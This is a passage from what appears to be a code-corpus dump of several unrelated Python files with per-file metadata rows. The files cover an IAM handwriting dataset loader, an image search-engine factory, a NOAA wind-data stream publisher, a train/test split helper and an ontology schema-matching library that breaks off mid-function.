from transformers import BertTokenizer
from .utils import nested_tensor_from_tensor_list
MAX_DIM = 299
def under_max(image):
if image.mode != 'RGB':
image = image.convert("RGB")
shape = np.array(image.size, dtype=np.float)
long_dim = max(shape)
scale = MAX_DIM / long_dim
new_shape = (shape * scale).astype(int)
image = image.resize(new_shape)
return image
class RandomRotation:
def __init__(self, angles=[0, 90, 180, 270]):
self.angles = angles
def __call__(self, x):
angle = random.choice(self.angles)
return TF.rotate(x, angle, expand=True)
def get_all_lines(image_name, ground_truth_folder_dir):
ground_truth_folder_dir = ground_truth_folder_dir
xml_root = ET.parse(
os.path.join(ground_truth_folder_dir, os.path.basename(os.path.splitext(image_name)[0]) + ".xml")).getroot()
results = []
width = int(xml_root.get("width"))
image_handwritten_root = xml_root.find("handwritten-part")
for line in image_handwritten_root.findall("line"):
start_x = int(line.get("asx"))
start_y = int(line.get("asy"))
image_ground_truth = line.get("text")
end_x = int(line.get("dsx"))
end_y = int(line.get("dsy"))
results.append(((start_x, start_y, end_x + width, end_y), image_ground_truth))
return results
class SyntheticIAMImage(Dataset):
def __init__(self, root, max_img_w, max_img_h, max_length, limit, transform, repeat=3,
mode='training'):
super().__init__()
self.root = root
self.max_img_w = max_img_w
self.max_img_h = max_img_h
self.transform = transform
gt_folder_dir = os.path.join(root, 'xml')
gt_lines = []
img_folders = ['formsA-D', 'formsE-H', 'formsI-Z']
for img_folder in img_folders:
for img in os.listdir(os.path.join(root, img_folder)):
img_path = os.path.join(root, img_folder, img)
for (start_x, start_y, end_x, end_y), line_ground_truth in get_all_lines(img_path, gt_folder_dir):
gt_lines.append({
'img_path': img_path,
'line_location': (start_x, start_y, end_x, end_y),
'gt': line_ground_truth
})
self.image_list = []
for _ in range(repeat):
random.shuffle(gt_lines)
index = 0
while index in range(len(gt_lines)):
group_size = random.randint(0, 10)
sub_image_list = []
for grp_index in range(group_size):
if (index + grp_index) >= len(gt_lines):
break
sub_image_list.append(gt_lines[index + grp_index])
self.image_list.append(sub_image_list)
index += group_size
train_set_size = round(len(self.image_list) * 0.8)
if mode == 'validation':
self.image_list = self.image_list[train_set_size:]
if mode == 'training':
self.image_list = self.image_list[: train_set_size]
self.tokenizer = BertTokenizer.from_pretrained(
'bert-base-uncased', do_lower=True)
self.max_length = max_length + 1
def __len__(self):
return len(self.image_list)
def __getitem__(self, idx):
images, gts = [], []
for line in self.image_list[idx]:
with Image.open(line['img_path']) as img:
start_x, start_y, end_x, end_y = line['line_location']
img = img.crop((start_x, start_y, end_x, end_y))
img = img.convert('RGB')
images.append(img)
gts.append(line['gt'])
image, image_ground_truth = combine_line_image_and_get_ground_truth(self.max_img_w, self.max_img_h,
images, gts)
if self.transform:
image = self.transform(image)
image = nested_tensor_from_tensor_list(image.unsqueeze(0), self.max_img_w, self.max_img_h)
caption_encoded = self.tokenizer.encode_plus(
image_ground_truth, max_length=self.max_length, pad_to_max_length=True, return_attention_mask=True,
return_token_type_ids=False, truncation=True)
caption = np.array(caption_encoded['input_ids'])
cap_mask = (
1 - np.array(caption_encoded['attention_mask'])).astype(bool)
return image.tensors.squeeze(0), image.mask.squeeze(0), caption, cap_mask
def combine_line_image_and_get_ground_truth(max_w, max_h, sub_line_images, ground_truth):
if len(sub_line_images) == 0:
return Image.new('L', (max_w, max_h), 255), ""
combined_image = Image.new('RGB', (max_w, max_h), (255, 255, 255))
indent_top = random.randint(int(max_h * 0.005), int(max_h * 0.01))
temp_height = indent_top
indent = 0
ref_w, ref_h = int(max_w - indent * 2), int((max_h - indent_top) / 10)
for image in sub_line_images:
width, height = image.size
ratio = min(ref_w / width, ref_h / height)
resized_image = image.resize((int(width * ratio), int(height * ratio)), Image.ANTIALIAS)
# Combine line image
width, height = resized_image.size
combined_image.paste(resized_image, (indent, temp_height))
temp_height += height
combined_image = combined_image.convert('L')
return combined_image, '\n'.join(ground_truth)
def build_dataset(config, transforms, mode='training', repeat=3):
data = SyntheticIAMImage(config.iam_dir, config.max_img_w, config.max_img_h,
max_length=config.max_position_embeddings,
limit=config.limit, transform=transforms, mode=mode, repeat=repeat)
return data
| 36.305389 | 116 | 0.61933 | 821 | 6,063 | 4.269184 | 0.233861 | 0.043937 | 0.033381 | 0.017118 | 0.154066 | 0.119829 | 0.115264 | 0.076462 | 0.035378 | 0 | 0 | 0.011328 | 0.271978 | 6,063 | 166 | 117 | 36.524096 | 0.782737 | 0.002969 | 0 | 0 | 0 | 0 | 0.03442 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070313 | false | 0 | 0.085938 | 0.007813 | 0.234375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bac90785ee9d2b6b8dbf64e7b92696ce0bb3f65 | 1,177 | py | Python | idt/factories.py | Bergolfs/idt | 22a1d19a42b16a87f9045b45805f82efe34885cf | [
"MIT"
] | null | null | null | idt/factories.py | Bergolfs/idt | 22a1d19a42b16a87f9045b45805f82efe34885cf | [
"MIT"
] | null | null | null | idt/factories.py | Bergolfs/idt | 22a1d19a42b16a87f9045b45805f82efe34885cf | [
"MIT"
] | null | null | null | from idt.duckgo import DuckGoSearchEngine
from idt.bing import BingSearchEngine
from idt.bing_api import BingApiSearchEngine
from idt.flickr_api import FlickrApiSearchEngine
__name__ = "factories"
class SearchEngineFactory:
def __init__(self,data,n_images,folder,verbose,root_folder,size,engine,api_key):
self.data = data
self.n_images = n_images
self.folder = folder
self.verbose = verbose
self.root_folder = root_folder
self.size = size
self.engine = engine
self.api_key = api_key
self.getSearchEngine()
def getSearchEngine(self):
if self.engine == "duckgo":
return DuckGoSearchEngine(self.data, self.n_images, self.folder,self.verbose,self.root_folder, self.size)
elif self.engine == "bing":
return BingSearchEngine(self.data, self.n_images, self.folder,self.verbose,self.root_folder, self.size)
elif self.engine == "bing_api":
return BingApiSearchEngine(self.data, self.n_images, self.folder,self.verbose,self.root_folder, self.size, self.api_key)
elif self.engine == "flickr_api":
return FlickrApiSearchEngine(self.data, self.n_images, self.folder,self.verbose,self.root_folder, self.size, self.api_key)
else:
return None
| 37.967742 | 125 | 0.776551 | 166 | 1,177 | 5.319277 | 0.198795 | 0.11325 | 0.050963 | 0.084938 | 0.344281 | 0.344281 | 0.344281 | 0.344281 | 0.344281 | 0.344281 | 0 | 0 | 0.119796 | 1,177 | 30 | 126 | 39.233333 | 0.852317 | 0 | 0 | 0 | 0 | 0 | 0.031436 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.148148 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bae7bbd789ea3ac35f03b0a03ec727ec87d770c | 3,075 | py | Python | noaa.py | microprediction/windspeed | 0ea88079ac8ae8955c4ba5cbcf1cd1aed64beb10 | [
"MIT"
] | null | null | null | noaa.py | microprediction/windspeed | 0ea88079ac8ae8955c4ba5cbcf1cd1aed64beb10 | [
"MIT"
] | null | null | null | noaa.py | microprediction/windspeed | 0ea88079ac8ae8955c4ba5cbcf1cd1aed64beb10 | [
"MIT"
] | 1 | 2021-12-19T16:25:22.000Z | 2021-12-19T16:25:22.000Z | # New video tutorials are available at https://www.microprediction.com/python-1 to help you
# get started creating streams (see the 4th module in particular)
import logging
import urllib
import time
import pytz
import random
from datetime import datetime
from pprint import pprint
from microprediction import MicroWriter
import os
write_key = os.environ.get('WRITE_KEY') # GitHub action needs to set env variable. You need to create a GitHub secret called WRITE_KEY
mw = MicroWriter(write_key=write_key)
assert mw.key_difficulty(mw.write_key)>=13, "You need a key of difficulty 13 for copula streams"
mw.set_repository(url='https://github.com/microprediction/microprediction/blob/master/microprediction/live/seattle_wind.py') # courtesy
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
def wait_between_attempts():
""" Incremental backoff between connection attempts """
wait_time = 5.3 # time is in seconds
while True:
yield wait_time
wait_time = min(wait_time * 1.5, 30)
wait_time *= (100 + random.randint(0, 50)) / 100
wait_time = wait_between_attempts()
prev_data = None
idx = None
def fetch_live_data(location):
global prev_data
global idx
speed = 0
direction = 0
for retry_no in range(3):
try:
url = "https://www.ndbc.noaa.gov/data/5day2/"+location+"_5day.cwind"
print(url)
file = urllib.request.urlopen(url=url)
if file.status==200:
# NOTE: file is not indexable
for i, line in enumerate(file):
# most recent data is at line number 3 in the file
if i == 2:
data = line.decode("utf-8").split()
if prev_data == data:
idx -= 2
else:
prev_data = data
idx = 6
break
for i, line in enumerate(file):
if i == idx:
direction = float(data[5]) / 360 # normalize between [0, 1)
speed = float(data[6]) / 10 # attempt to normalize
return speed, direction
except:
logger.error("Connection error: reconnecting...")
time.sleep(next(wait_time))
return speed, direction
LOCATIONS_1 = ['41008','44005','46060','46061']
LOCATIONS_2 = ['46073','46076','46077','46078']
def fetch_data(locations):
names = list()
values = list()
for location in locations:
speed, direction = fetch_live_data(location=location)
names.append('noaa_wind_speed_'+location+'.json')
values.append(speed)
names.append('noaa_wind_direction_'+location+'.json')
values.append(direction)
return names, values
if __name__=='__main__':
for locations in [LOCATIONS_1,LOCATIONS_2]:
names, values = fetch_data(locations=locations)
res = mw.cset(names=names, values=values)
| 33.791209 | 137 | 0.609431 | 379 | 3,075 | 4.802111 | 0.430079 | 0.030769 | 0.020879 | 0.023077 | 0.025275 | 0.025275 | 0 | 0 | 0 | 0 | 0 | 0.040609 | 0.295285 | 3,075 | 90 | 138 | 34.166667 | 0.799262 | 0.145366 | 0 | 0.057971 | 0 | 0.014493 | 0.129353 | 0 | 0 | 0 | 0 | 0 | 0.014493 | 1 | 0.043478 | false | 0 | 0.130435 | 0 | 0.217391 | 0.028986 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb1e0e67d45581de03559a2275a7b5ca7ba495a | 3,384 | py | Python | shfl/data_base/data_base.py | joarreg/Sherpa.ai-Federated-Learning-Framework | 9da392bf71c9acf13761dde0f119622c62780c87 | [
"Apache-2.0"
] | 2 | 2021-11-14T12:04:39.000Z | 2022-01-03T16:03:36.000Z | shfl/data_base/data_base.py | joarreg/Sherpa.ai-Federated-Learning-Framework | 9da392bf71c9acf13761dde0f119622c62780c87 | [
"Apache-2.0"
] | null | null | null | shfl/data_base/data_base.py | joarreg/Sherpa.ai-Federated-Learning-Framework | 9da392bf71c9acf13761dde0f119622c62780c87 | [
"Apache-2.0"
] | 1 | 2022-01-19T16:29:46.000Z | 2022-01-19T16:29:46.000Z | import abc
import numpy as np
def split_train_test(data, labels, dim):
"""
Method that randomly choose the train and test sets from data and labels.
# Arguments:
data: Numpy matrix with data for extract the validation data
labels: Numpy array with labels
dim: Size for validation data
# Returns:
new_data: Data, labels, validation data and validation labels
"""
randomize = np.arange(len(labels))
np.random.shuffle(randomize)
data = data[randomize, ]
labels = labels[randomize]
test_data = data[0:dim, ]
test_labels = labels[0:dim]
rest_data = data[dim:, ]
rest_labels = labels[dim:]
return rest_data, rest_labels, test_data, test_labels
class DataBase(abc.ABC):
"""
Abstract class for data base.
Load method must be implemented in order to create a database able to \
interact with the system, in concrete with data distribution methods \
(see: [Data Distribution](../data_distribution)).
Load method should save data in the protected Attributes:
# Attributes:
* **train_data, train_labels, test_data, test_labels**
# Properties:
train: Returns train data and labels
test: Returns test data and labels
data: Returns train data, train labels, validation data, validation labels, test data and test labels
"""
def __init__(self):
self._train_data = []
self._test_data = []
self._train_labels = []
self._test_labels = []
@property
def train(self):
return self._train_data, self._train_labels
@property
def test(self):
return self._test_data, self._test_labels
@property
def data(self):
return self._train_data, self._train_labels, self._test_data, self._test_labels
@abc.abstractmethod
def load_data(self):
"""
Abstract method that loads the data
"""
def shuffle(self):
"""
Shuffles all data
"""
randomize = np.arange(len(self._train_labels))
np.random.shuffle(randomize)
self._train_data = self._train_data[randomize, ]
self._train_labels = self._train_labels[randomize]
randomize = np.arange(len(self._test_labels))
np.random.shuffle(randomize)
self._test_data = self._test_data[randomize, ]
self._test_labels = self._test_labels[randomize]
class LabeledDatabase(DataBase):
"""
Class to create generic labeled database from data and labels vectors
# Arguments
data: Data features to load
labels: Labels for this features
train_percentage: float between 0 and 1 to indicate how much data is dedicated to train
"""
def __init__(self, data, labels, train_percentage=0.8):
super(DataBase, self).__init__()
self._data = data
self._labels = labels
self._train_percentage = train_percentage
def load_data(self):
"""
Load data
# Returns
all_data : train data, train labels, test data and test labels
"""
test_size = round(len(self._data) * (1 - self._train_percentage))
self._train_data, self._train_labels, \
self._test_data, self._test_labels = split_train_test(self._data, self._labels, test_size)
self.shuffle()
return self.data
| 28.677966 | 109 | 0.649232 | 423 | 3,384 | 4.959811 | 0.208038 | 0.064347 | 0.050048 | 0.040515 | 0.260725 | 0.177788 | 0.074357 | 0.074357 | 0.051478 | 0.051478 | 0 | 0.002816 | 0.265366 | 3,384 | 117 | 110 | 28.923077 | 0.84111 | 0.368794 | 0 | 0.16 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.18 | false | 0 | 0.04 | 0.06 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb2c6977e580018666f892e53fb97c55744bde7 | 26,945 | py | Python | ontomatch/matcher_lib.py | RogerTangos/aurum_debug | fa3afd96c795e9b674a5951430635d43aa3f5c78 | [
"MIT"
] | null | null | null | ontomatch/matcher_lib.py | RogerTangos/aurum_debug | fa3afd96c795e9b674a5951430635d43aa3f5c78 | [
"MIT"
] | 6 | 2020-06-05T17:52:29.000Z | 2021-06-10T19:44:58.000Z | ontomatch/matcher_lib.py | RogerTangos/aurum_debug | fa3afd96c795e9b674a5951430635d43aa3f5c78 | [
"MIT"
] | null | null | null | from enum import Enum
import time
from collections import defaultdict
from nltk.corpus import stopwords
from dataanalysis import nlp_utils as nlp
from ontomatch import glove_api
from ontomatch import ss_utils as SS
from datasketch import MinHash, MinHashLSH
from knowledgerepr.networkbuilder import LSHRandomProjectionsIndex
from dataanalysis import dataanalysis as da
import operator
from collections import namedtuple
class MatchingType(Enum):
L1_CLASSNAME_ATTRVALUE = 0
L2_CLASSVALUE_ATTRVALUE = 1
L3_CLASSCTX_RELATIONCTX = 2
L4_CLASSNAME_RELATIONNAME_SYN = 3
L42_CLASSNAME_RELATIONNAME_SEM = 4
L5_CLASSNAME_ATTRNAME_SYN = 5
L52_CLASSNAME_ATTRNAME_SEM = 6
L6_CLASSNAME_RELATION_SEMSIG = 7
L7_CLASSNAME_ATTRNAME_FUZZY = 8
class SimpleTrie:
def __init__(self):
self._leave = "_leave_"
self.root = dict()
def add_sequences(self, sequences):
for seq in sequences:
current_dict = self.root
for token in seq:
current_dict = current_dict.setdefault(token, {}) # another dict as default
current_dict[self._leave] = self._leave
return self.root
def longest_prefix(self):
return
class Matching:
def __init__(self, db_name, source_name):
self.db_name = db_name
self.source_name = source_name
self.source_level_matchings = defaultdict(lambda: defaultdict(list))
self.attr_matchings = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))
def add_relation_correspondence(self, kr_name, class_name, matching_type):
self.source_level_matchings[kr_name][class_name].append(matching_type)
def add_attribute_correspondence(self, attr_name, kr_name, class_name, matching_type):
self.attr_matchings[attr_name][kr_name][class_name].append(matching_type)
def __str__(self):
header = self.db_name + " - " + self.source_name
relation_matchings = list()
relation_matchings.append(header)
if len(self.source_level_matchings.items()) > 0:
for kr_name, values in self.source_level_matchings.items():
for class_name, matchings in values.items():
line = kr_name + " - " + class_name + " : " + str(matchings)
relation_matchings.append(line)
else:
line = "0 relation matchings"
relation_matchings.append(line)
if len(self.attr_matchings.items()) > 0:
for attr_name, values in self.attr_matchings.items():
for kr_name, classes in values.items():
for class_name, matchings in classes.items():
line = attr_name + " -> " + kr_name + " - " + class_name + " : " + str(matchings)
relation_matchings.append(line)
string_repr = '\n'.join(relation_matchings)
return string_repr
def print_serial(self):
relation_matchings = []
for kr_name, values in self.source_level_matchings.items():
for class_name, matchings in values.items():
line = self.db_name + " %%% " + self.source_name + " %%% _ -> " + kr_name \
+ " %%% " + class_name + " %%% " + str(matchings)
relation_matchings.append(line)
for attr_name, values in self.attr_matchings.items():
for kr_name, classes in values.items():
for class_name, matchings in classes.items():
line = self.db_name + " %%% " + self.source_name + " %%% " + attr_name \
+ " -> " + kr_name + " %%% " + class_name + " %%% " + str(matchings)
relation_matchings.append(line)
#string_repr = '\n'.join(relation_matchings)
return relation_matchings
def combine_matchings(all_matchings):
def process_attr_matching(building_matching_objects, m, matching_type):
sch, krn = m
db_name, source_name, field_name = sch
kr_name, class_name = krn
mobj = building_matching_objects.get((db_name, source_name), None)
if mobj is None:
mobj = Matching(db_name, source_name)
mobj.add_attribute_correspondence(field_name, kr_name, class_name, matching_type)
building_matching_objects[(db_name, source_name)] = mobj
def process_relation_matching(building_matching_objects, m, matching_type):
sch, krn = m
db_name, source_name, field_name = sch
kr_name, class_name = krn
mobj = building_matching_objects.get((db_name, source_name), None)
if mobj is None:
mobj = Matching(db_name, source_name)
mobj.add_relation_correspondence(kr_name, class_name, matching_type)
building_matching_objects[(db_name, source_name)] = mobj
l1_matchings = all_matchings[MatchingType.L1_CLASSNAME_ATTRVALUE]
l2_matchings = all_matchings[MatchingType.L2_CLASSVALUE_ATTRVALUE]
l4_matchings = all_matchings[MatchingType.L4_CLASSNAME_RELATIONNAME_SYN]
l42_matchings = all_matchings[MatchingType.L42_CLASSNAME_RELATIONNAME_SEM]
l5_matchings = all_matchings[MatchingType.L5_CLASSNAME_ATTRNAME_SYN]
l52_matchings = all_matchings[MatchingType.L52_CLASSNAME_ATTRNAME_SEM]
l6_matchings = all_matchings[MatchingType.L6_CLASSNAME_RELATION_SEMSIG]
l7_matchings = all_matchings[MatchingType.L7_CLASSNAME_ATTRNAME_FUZZY]
building_matching_objects = defaultdict(None) # (db_name, source_name) -> stuff
for m in l1_matchings:
process_attr_matching(building_matching_objects, m, MatchingType.L1_CLASSNAME_ATTRVALUE)
for m in l2_matchings:
process_attr_matching(building_matching_objects, m, MatchingType.L2_CLASSVALUE_ATTRVALUE)
for m in l4_matchings:
process_relation_matching(building_matching_objects, m, MatchingType.L4_CLASSNAME_RELATIONNAME_SYN)
for m in l42_matchings:
process_relation_matching(building_matching_objects, m, MatchingType.L42_CLASSNAME_RELATIONNAME_SEM)
for m in l5_matchings:
process_attr_matching(building_matching_objects, m, MatchingType.L5_CLASSNAME_ATTRNAME_SYN)
for m in l52_matchings:
process_attr_matching(building_matching_objects, m, MatchingType.L52_CLASSNAME_ATTRNAME_SEM)
for m in l6_matchings:
process_relation_matching(building_matching_objects, m, MatchingType.L6_CLASSNAME_RELATION_SEMSIG)
for m in l7_matchings:
process_attr_matching(building_matching_objects, m, MatchingType.L7_CLASSNAME_ATTRNAME_FUZZY)
return building_matching_objects
def combine_matchings2(all_matchings):
# TODO: divide running score, based on whether content was available or not (is it really necessary?)
# L1 creates its own matchings
l1_matchings = all_matchings[MatchingType.L1_CLASSNAME_ATTRVALUE]
# L2, L5, L52 and L6 create another set of matchings
l2_matchings = all_matchings[MatchingType.L2_CLASSVALUE_ATTRVALUE]
l5_matchings = all_matchings[MatchingType.L5_CLASSNAME_ATTRNAME_SYN]
l52_matchings = all_matchings[MatchingType.L52_CLASSNAME_ATTRNAME_SEM]
l6_matchings = all_matchings[MatchingType.L6_CLASSNAME_RELATION_SEMSIG]
l7_matchings = all_matchings[MatchingType.L7_CLASSNAME_ATTRNAME_FUZZY]
l_combined = dict()
for schema, kr in l1_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)] = (
(schema, kr), [MatchingType.L1_CLASSNAME_ATTRVALUE])
for schema, kr in l7_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
if (db_name, src_name, attr_name, kr_name, cla_name) in l_combined:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)][1].append(
MatchingType.L7_CLASSNAME_ATTRNAME_FUZZY)
for schema, kr in l2_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
if (db_name, src_name, attr_name, kr_name, cla_name) in l_combined:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)][1].append(
MatchingType.L2_CLASSNAME_ATTRNAME_SYN)
else:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)] = (
(schema, kr), [MatchingType.L2_CLASSVALUE_ATTRVALUE])
for schema, kr in l5_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
if (db_name, src_name, attr_name, kr_name, cla_name) in l_combined:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)][1].append(
MatchingType.L5_CLASSNAME_ATTRNAME_SYN)
else:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)] = (
(schema, kr), [MatchingType.L5_CLASSNAME_ATTRNAME_SYN])
for schema, kr in l52_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
if (db_name, src_name, attr_name, kr_name, cla_name) in l_combined:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)][1].append(
MatchingType.L52_CLASSNAME_ATTRNAME_SEM)
else:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)] = (
(schema, kr), [MatchingType.L52_CLASSNAME_ATTRNAME_SEM])
for schema, kr in l6_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
if (db_name, src_name, attr_name, kr_name, cla_name) in l_combined:
# TODO: only append in the matching types are something except L1?
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)][1].append(
MatchingType.L6_CLASSNAME_RELATION_SEMSIG)
# L4 and L42 have their own matching too
l4_matchings = all_matchings[MatchingType.L4_CLASSNAME_RELATIONNAME_SYN]
combined_matchings = []
for key, values in l_combined.items():
matching = values[0]
matching_types = values[1]
# for el in values:
# matching = el[0]
# matching_types = el[1]
combined_matchings.append((matching, matching_types))
combined_matchings = sorted(combined_matchings, key=lambda x: len(x[1]), reverse=True)
return combined_matchings, l4_matchings
def find_relation_class_attr_name_sem_matchings(network, kr_handlers):
# Retrieve relation names
#self.find_relation_class_name_sem_matchings()
st = time.time()
names = []
seen_fields = []
for (db_name, source_name, field_name, _) in network.iterate_values():
orig_field_name = field_name
if field_name not in seen_fields:
seen_fields.append(field_name) # seen already
field_name = nlp.camelcase_to_snakecase(field_name)
field_name = field_name.replace('-', ' ')
field_name = field_name.replace('_', ' ')
field_name = field_name.lower()
svs = []
for token in field_name.split():
if token not in stopwords.words('english'):
sv = glove_api.get_embedding_for_word(token)
if sv is not None:
svs.append(sv)
names.append(('attribute', (db_name, source_name, orig_field_name), svs))
num_attributes_inserted = len(names)
# Retrieve class names
for kr_name, kr_handler in kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
original_cl_name = cl
cl = nlp.camelcase_to_snakecase(cl)
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
svs = []
for token in cl.split():
if token not in stopwords.words('english'):
sv = glove_api.get_embedding_for_word(token)
if sv is not None:
svs.append(sv)
names.append(('class', (kr_name, original_cl_name), svs))
matchings = []
for idx_rel in range(0, num_attributes_inserted): # Compare only with classes
for idx_class in range(num_attributes_inserted, len(names)):
svs_rel = names[idx_rel][2]
svs_cla = names[idx_class][2]
semantic_sim = SS.compute_semantic_similarity(svs_rel, svs_cla)
if semantic_sim > 0.8:
# match.format db_name, source_name, field_name -> class_name
match = ((names[idx_rel][1][0], names[idx_rel][1][1], names[idx_rel][1][2]), names[idx_class][1])
matchings.append(match)
et = time.time()
print("Time to relation-class (sem): " + str(et - st))
return matchings
def find_relation_class_attr_name_matching(network, kr_handlers):
# Retrieve relation names
st = time.time()
names = []
seen_fields = []
for (db_name, source_name, field_name, _) in network.iterate_values():
orig_field_name = field_name
if field_name not in seen_fields:
seen_fields.append(field_name) # seen already
field_name = nlp.camelcase_to_snakecase(field_name)
field_name = field_name.replace('-', ' ')
field_name = field_name.replace('_', ' ')
field_name = field_name.lower()
m = MinHash(num_perm=64)
for token in field_name.split():
if token not in stopwords.words('english'):
m.update(token.encode('utf8'))
names.append(('attribute', (db_name, source_name, orig_field_name), m))
num_attributes_inserted = len(names)
# Retrieve class names
for kr_name, kr_handler in kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
original_cl_name = cl
cl = nlp.camelcase_to_snakecase(cl)
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
m = MinHash(num_perm=64)
for token in cl.split():
if token not in stopwords.words('english'):
m.update(token.encode('utf8'))
names.append(('class', (kr_name, original_cl_name), m))
# Index all the minhashes
lsh_index = MinHashLSH(threshold=0.6, num_perm=64)
for idx in range(len(names)):
lsh_index.insert(idx, names[idx][2])
matchings = []
for idx in range(0, num_attributes_inserted): # Compare only with classes
N = lsh_index.query(names[idx][2])
for n in N:
kind_q = names[idx][0]
kind_n = names[n][0]
if kind_n != kind_q:
# match.format db_name, source_name, field_name -> class_name
match = ((names[idx][1][0], names[idx][1][1], names[idx][1][2]), names[n][1])
matchings.append(match)
return matchings
def find_relation_class_name_sem_matchings(network, kr_handlers):
# Retrieve relation names
st = time.time()
names = []
seen_sources = []
for (db_name, source_name, _, _) in network.iterate_values():
original_source_name = source_name
if source_name not in seen_sources:
seen_sources.append(source_name) # seen already
source_name = source_name.replace('-', ' ')
source_name = source_name.replace('_', ' ')
source_name = source_name.lower()
svs = []
for token in source_name.split():
if token not in stopwords.words('english'):
sv = glove_api.get_embedding_for_word(token)
#if sv is not None:
svs.append(sv) # append even None, to apply penalization later
names.append(('relation', (db_name, original_source_name), svs))
num_relations_inserted = len(names)
# Retrieve class names
for kr_name, kr_handler in kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
original_cl_name = cl
cl = nlp.camelcase_to_snakecase(cl)
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
svs = []
for token in cl.split():
if token not in stopwords.words('english'):
sv = glove_api.get_embedding_for_word(token)
#if sv is not None:
svs.append(sv) # append even None, to apply penalization later
names.append(('class', (kr_name, original_cl_name), svs))
matchings = []
for idx_rel in range(0, num_relations_inserted): # Compare only with classes
for idx_class in range(num_relations_inserted, len(names)):
svs_rel = names[idx_rel][2]
svs_cla = names[idx_class][2]
semantic_sim = SS.compute_semantic_similarity(svs_rel, svs_cla, penalize_unknown_word=True, add_exact_matches=False)
#semantic_sim = SS.compute_semantic_similarity(svs_rel, svs_cla)
if semantic_sim > 0.5:
# match.format is db_name, source_name, field_name -> class_name
match = ((names[idx_rel][1][0], names[idx_rel][1][1], "_"), names[idx_class][1])
matchings.append(match)
et = time.time()
print("Time to relation-class (sem): " + str(et - st))
return matchings
def find_relation_class_name_matchings(network, kr_handlers):
# Retrieve relation names
st = time.time()
names = []
seen_sources = []
for (db_name, source_name, _, _) in network.iterate_values():
original_source_name = source_name
if source_name not in seen_sources:
seen_sources.append(source_name) # seen already
source_name = nlp.camelcase_to_snakecase(source_name)
source_name = source_name.replace('-', ' ')
source_name = source_name.replace('_', ' ')
source_name = source_name.lower()
m = MinHash(num_perm=32)
for token in source_name.split():
if token not in stopwords.words('english'):
m.update(token.encode('utf8'))
names.append(('relation', (db_name, original_source_name), m))
num_relations_inserted = len(names)
# Retrieve class names
for kr_name, kr_handler in kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
original_cl_name = cl
cl = nlp.camelcase_to_snakecase(cl)
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
m = MinHash(num_perm=32)
for token in cl.split():
if token not in stopwords.words('english'):
m.update(token.encode('utf8'))
names.append(('class', (kr_name, original_cl_name), m))
# Index all the minhashes
lsh_index = MinHashLSH(threshold=0.5, num_perm=32)
for idx in range(len(names)):
lsh_index.insert(idx, names[idx][2])
matchings = []
for idx in range(0, num_relations_inserted): # Compare only with classes
N = lsh_index.query(names[idx][2])
for n in N:
kind_q = names[idx][0]
kind_n = names[n][0]
if kind_n != kind_q:
# match.format is db_name, source_name, field_name -> class_name
match = ((names[idx][1][0], names[idx][1][1], "_"), names[n][1])
matchings.append(match)
et = time.time()
print("Time to relation-class (name): " + str(et - st))
return matchings
def __find_relation_class_matchings(self):
# Retrieve relation names
st = time.time()
docs = []
names = []
seen_sources = []
for (_, source_name, _, _) in self.network.iterate_values():
if source_name not in seen_sources:
seen_sources.append(source_name) # seen already
source_name = source_name.replace('-', ' ')
source_name = source_name.replace('_', ' ')
source_name = source_name.lower()
docs.append(source_name)
names.append(('relation', source_name))
# Retrieve class names
for kr_item, kr_handler in self.kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
docs.append(cl)
